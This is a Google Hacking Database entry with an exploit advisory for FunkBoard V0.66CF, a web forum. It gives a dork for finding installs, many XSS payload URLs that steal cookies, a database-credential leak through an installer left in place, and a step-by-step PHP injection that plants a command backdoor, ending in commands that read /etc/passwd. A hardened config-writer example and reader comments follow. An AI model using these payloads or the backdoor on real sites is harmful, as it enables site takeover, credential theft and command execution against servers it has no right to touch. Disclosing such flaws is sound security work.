GHDB « Hackers For Charity

GHDB


Google Search: “Powered by FunkBoard”

rgod rates this entry 10 out of 10.
Submitted: 2005-08-08 00:00:00
Added by: rgod
Hits: 5323
Score: 10

FunkBoard V0.66CF (possibly prior versions): cross-site scripting, possible database username/password disclosure and board takeover, possible remote code execution

software:
author site: http://www.[path_to_funkboard].co.uk/

xss:

http://[target]/[path_to_funkboard]/editpost.php?fbusername=">alert(document.cookie)
http://[target]/[path_to_funkboard]/editpost.php?fbpassword=">alert(document.cookie)
http://[target]/[path_to_funkboard]/prefs.php?fbpassword=">alert(document.cookie)
http://[target]/[path_to_funkboard]/prefs.php?fbusername=">alert(document.cookie)
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername=">alert(document.cookie)
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword=">alert(document.cookie)
http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject=">alert(document.cookie)
http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername=">alert(document.cookie)
http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword=">alert(document.cookie)
http://[target]/[path_to_funkboard]/profile.php?fbusername=">alert(document.cookie)
http://[target]/[path_to_funkboard]/profile.php?fbpassword=">alert(document.cookie)
http://[target]/[path_to_funkboard]/register.php?fbusername=">alert(document.cookie)
http://[target]/[path_to_funkboard]/register.php?fmail=">alert(document.cookie)
http://[target]/[path_to_funkboard]/register.php?www=">alert(document.cookie)
http://[target]/[path_to_funkboard]/register.php?icq=">alert(document.cookie)
http://[target]/[path_to_funkboard]/register.php?yim=">alert(document.cookie)
http://[target]/[path_to_funkboard]/register.php?location=">alert(document.cookie)
http://[target]/[path_to_funkboard]/register.php?sex=">alert(document.cookie)
http://[target]/[path_to_funkboard]/register.php?interebbies=">alert(document.cookie)
http://[target]/[path_to_funkboard]/register.php?sig=alert(document.cookie)
http://[target]/[path_to_funkboard]/register.php?aim=">alert(document.cookie)

path disclosure:

http://[target]/[path_to_funkboard]/images/forums.php

database username & password disclosure:

During installation, the user is not reminded to delete the mysql_install script, and the installation does not delete it. It is usually at:

http://[target]/[path]/admin/mysql_install.php
or
http://[target]/[path]/admin/pg_install.php

There, a user can see the database username and password in clear text … Then the script lets the user proceed to the next page, where he can reset the FunkBoard administrator username and password. Now the script fails, because some tables already exist, etc. So the user can go back and set a new database name for the installation, guessing among other installations on the server… Once the installation succeeds, he can set a new admin username and password, then log in at this page:

http://[target]/[path]/[path_to_funkboard]/admin/index.php

Now the user can edit templates and append some evil JavaScript code.

remote code execution:

Look at this code in mysql_install.php:

    $infoout = "";
    echo "Writing Config File";
    unlink("../info.php");            // remove any existing config file
    $outname = "../info.php";
    $file = fopen($outname, "w+");
    fputs($file, $infoout);           // $infoout is written to info.php as-is
    fclose($file);

Clearly, you can inject PHP code. Example: go to http://[target]/[path]/admin/mysql_install.php and, in the email field (not checked), write:

    email@domain.com'; error_reporting(0); system($HTTP_GET_VARS[command]); echo '

Press continue… Now look at info.php, the config file in the main directory; you have:

so, you have a backdoor on the target system… you can launch commands with these URLs:

http://localhost:30/funkboard/info.php?command=ls%20-la
to list directories…

http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd
to see the /etc/passwd file
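
The mysql_install.php problems described above come from writing unchecked form input into a PHP file and from an installer that can be run again. The following is an added example of a hardened config writer, not FunkBoard's code and not part of the original advisory; the function names, field names, file name and sample values are assumptions.

```php
<?php
// Added example, not FunkBoard code. Function and field names are hypothetical.

/** Build the config file body from installer form fields. */
function build_config(array $fields): string
{
    // The advisory notes the email field was not checked: validate it first.
    $email = $fields['email'] ?? '';
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('invalid email address');
    }
    $config = ['email' => $email];
    foreach (['dbhost', 'dbname', 'dbuser', 'dbpass'] as $key) {
        $config[$key] = (string) ($fields[$key] ?? '');
    }
    // var_export() emits quoted literals: a quote in a value cannot end its string.
    return "<?php\nreturn " . var_export($config, true) . ";\n";
}

/** Write the config once; a repeated installer run must not replace it. */
function write_config(string $path, array $fields): void
{
    $body = build_config($fields);
    // Mode 'x' fails if the file already exists (no unlink-and-rewrite).
    $fh = @fopen($path, 'x');
    if ($fh === false) {
        throw new RuntimeException('already installed: config file exists');
    }
    fwrite($fh, $body);
    fclose($fh);
}

// Constructed sample input: the password carries a quote-breakout attempt.
$fields = [
    'email'  => 'admin@example.com',
    'dbname' => 'forum',
    'dbuser' => 'forum',
    'dbpass' => "x'; echo 'INJECTED'; //",
];
$path = sys_get_temp_dir() . '/info_' . bin2hex(random_bytes(4)) . '.php';
write_config($path, $fields);
$loaded = include $path;   // the generated file only returns an array
var_dump($loaded['dbpass'] === $fields['dbpass']);   // compare loaded value with input
try {
    write_config($path, $fields);   // simulated second installer run
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
unlink($path);
```

Removing or blocking access to the admin/*_install.php scripts after setup is still required; the exclusive-create check only stops an existing config from being overwritten.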


Comments:


5 Responses to “GHDB”

  1. Jack says:

    Does GHDB still update for now?

  2. Johnny says:

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:

    Hi Johnny, been a while since I’ve come last. Aren’t you gonna update this website anymore???

  4. Johnny says:

    The GHDB is not updated and lives with the exploitdb: http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:

    Are any offline viewable resources available for this product?
